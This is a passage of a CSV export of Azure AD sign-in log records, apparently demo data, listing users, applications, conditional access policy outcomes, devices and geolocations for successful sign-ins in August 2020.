80.0.3987'}",6382c33b-18b0-46b9-982e-4aa95dad0f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,6382c33b-18b0-46b9-982e-4aa95dad0f00,SigninLogs,Sucess,33.7984581,-84.38828278
+1911,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:10.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,bb158cd2-e8ee-4b6c-930f-e344add08c81,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",d1f5cda6-13d0-4741-81eb-e384094a0f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,d1f5cda6-13d0-4741-81eb-e384094a0f00,SigninLogs,Sucess,38.73078156,-78.17196655
+1912,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:14.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,dc552806-3c86-4dbe-970f-80fa24f54356,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",dfcca72f-40c4-4044-85c7-4ddd1dd71100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,dfcca72f-40c4-4044-85c7-4ddd1dd71100,SigninLogs,Sucess,33.7984581,-84.38828278
+1913,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:44.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,37b440c6-5fca-4b04-845d-e14952332753,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",dfda3bbc-b55b-4a89-a1fb-2fc02d610f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,dfda3bbc-b55b-4a89-a1fb-2fc02d610f00,SigninLogs,Sucess,33.7984581,-84.38828278
+1914,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:46.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4481185e-733c-479a-8afe-6f593c485f5e,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 14:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",dfda3bbc-b55b-4a89-a1fb-2fc093610f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,dfda3bbc-b55b-4a89-a1fb-2fc093610f00,SigninLogs,Sucess,33.7984581,-84.38828278
+1915,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,47:45.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0afac25f-44ce-44fd-b06d-3f13333126be,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:47,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",c0245186-29e3-436a-add4-db49b8f60f00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c0245186-29e3-436a-add4-db49b8f60f00,SigninLogs,Sucess,38.73078156,-78.17196655
+1916,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:04.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,75c7469f-005c-0000-5d33-fa0d7909c9bd,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",189268ff-d871-4dc4-914e-2c96e85c1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,189268ff-d871-4dc4-914e-2c96e85c1100,SigninLogs,Sucess,33.7984581,-84.38828278
+1917,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:40.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8ee49ce6-0d93-4a88-b15a-3b44bae01973,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 15:05,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5423bf62-9037-4448-bcaa-3033d8241000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,5423bf62-9037-4448-bcaa-3033d8241000,SigninLogs,Sucess,33.7984581,-84.38828278
+1918,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:43.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,024fdd65-4acf-46c4-8e97-aaced536e2c0,Microsoft.aadiam,Microsoft.aadiam,,Lori Chaconas,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:07,"{'operatingSystem': 'Windows 10', 'deviceId': '3587ac6d-3b32-4895-bfa9-72dd03d38cb6', 'browser': 'Edge 18.1836', 'displayName': 'LCFLAGLER12', 'trustType': 'Azure AD registered', 'isCompliant': True, 'isManaged': True}",554bf1b2-bdac-4646-9ba2-bdd53c141b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -81.21395111083984, 'latitude': 29.480300903320312}, 'state': 'Florida', 'city': 'Palm Coast'}",none,none,none,none,[],{'errorCode': 0},Lori Chaconas,f0bc9cf3-99bd-47bd-a8d9-b9a3d2a8e647,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,554bf1b2-bdac-4646-9ba2-bdd53c141b00,SigninLogs,Sucess,29.4803009,-81.21395111
+1919,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,36:56.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': 